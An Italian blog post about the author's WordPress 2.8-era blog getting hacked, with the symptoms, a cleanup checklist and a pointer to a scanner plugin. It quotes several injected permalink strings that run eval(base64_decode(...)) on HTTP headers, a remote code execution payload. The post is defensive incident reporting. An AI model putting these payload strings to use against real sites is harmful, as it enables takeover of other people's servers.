Dopo aver trascorso qualche giorno di vacanza, sono rientrato a casa, ed accendendo il computer dopo un breve periodo di inutilizzo, mi accorgo di un’amara sorpresa proprio in questo blog.

Workpress.net è stato colpito da un attacco hacker!

La colpa è sicuramente del mancato aggiornamento all’ultima versione del nostro amato Cms, prima di partire per le vacanze, lasciando quindi il blog vulnerabile ad attacchi esterni. Proprio pochi giorni fà era circolata la notizia delle falle di sicurezza nelle ultime versioni di Wordpress, prontamente corrette con la versione 2.8.4 del Cms.

Symptoms of an hacked blog

Mi sono accorto di essere stato attaccato, dalle statistiche del blog che vedevano una drastica riduzione delle pageviews. Controllando direttamente sul blog mi sono accorto che ogni link presente nelle pagine del blog puntava ad un redirect esterno, in particolare ai link presenti nel blog venivano inserita questa stringa:

%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929

Ovvero la struttura dei permalinks del mio blog veniva modificata con l’aggiunta dell stringa qui sopra.

Altri esempi di redirect:

• %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
• “/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

How can I clean my hacked blog?

Dopo una rapida ricerca sul forum di Wordpress e su Google, mi sono messo all’opera per eliminare potenziali infezioni dal mio blog.

Ecco un breve elenco delle operazioni da eseguire:

1. Ho cancellato dal pannello di amministrazione un utente estraneo che aveva permessi da amministratore, creato ad hoc dall’attacco hacker, agendo direttamente dal pannello di phpMyAdmin (qualora non dovesse funzionare il comando delete dal pannello di controllo di Wordpress)
2. Ho cancellato completamente i file di wordpress (escluso il file wp-config e la cartella wp-content)
3. Ho scaricato l’ultima versione di Wordpress, la 2.8.4. e l’ho caricata con Ftp sul server.
4. Ho eseguito l’accesso al blog ed aggiornato le tabelle del database come da procedura guidata indicata dalla nuova installazione.
5. Ho cancellato e ricaricato il tema del blog sul server.
6. Ho cancellato e ricaricato tutti i plugin installati sul blog.
7. Ed infine ho cambiato la password di amministrazione del blog.

How to control if my blog was cleaned?

Cercando con Google casi analoghi ho trovato il blog di Donncha, sviluppatore irlandese di Wordpress, che metteva a disposizione un utile plugin per controllare lo stato di salute del vostro blog. Basta scaricarlo, installarlo ed attivarlo dal vostro pannello di controllo e potrete vedere se il vostro blog è stato ripulito per bene da codice malware.

Ecco il link per scaricare il plugin Exploit-scanner di Donncha. Scarica plugin

In conclusione voglio suggerire a tutti di impiegare un pò del proprio tempo per aggiornare prontamente la propria versione di wordpress installata nel proprio server, per evitare di venir attaccati e rischiare di perdere il proprio prezioso lavoro.

Prevenire è meglio che curare!

Post correlati:

• April 8, 2009 -- Free themes per Wordpress, attento agli spyware
• December 27, 2009 -- Released Carmen, the new Wordpress version 2.9
• April 27, 2009 -- Come controllare se il theme del tuo blog è infetto
• June 24, 2010 -- Wordpress 3 now available to donwload
• August 15, 2009 -- How to display raw code in your blog post
• July 17, 2009 -- How to insert Ads in your Rss Feed
• June 6, 2009 -- Randomize wordpress post order
• March 23, 2009 -- Arriva Wordpress.tv
• March 14, 2009 -- Rilasciata l'ultima versione di Wordpress, 2.7.1